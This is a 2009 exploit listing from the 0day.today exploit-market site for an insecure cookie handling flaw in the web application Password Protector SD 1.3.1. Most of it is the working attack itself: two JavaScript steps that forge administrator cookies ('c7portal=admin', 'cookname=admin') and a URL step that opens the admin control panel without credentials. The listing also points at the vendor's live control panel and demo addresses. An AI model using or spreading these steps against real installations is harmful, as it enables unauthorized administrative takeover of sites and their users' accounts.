[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability

Author
Mr.tro0oqy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5161
Category
web applications
Date add
12-05-2009
Platform
unsorted
==================================================================
Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability
==================================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";

step 2 [add]: javascript:document.cookie="cookname=admin;path=/";

step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home


in control panel : 

http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home


demo:
-----
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl

=======================================================



#  0day.today [2024-12-25]  #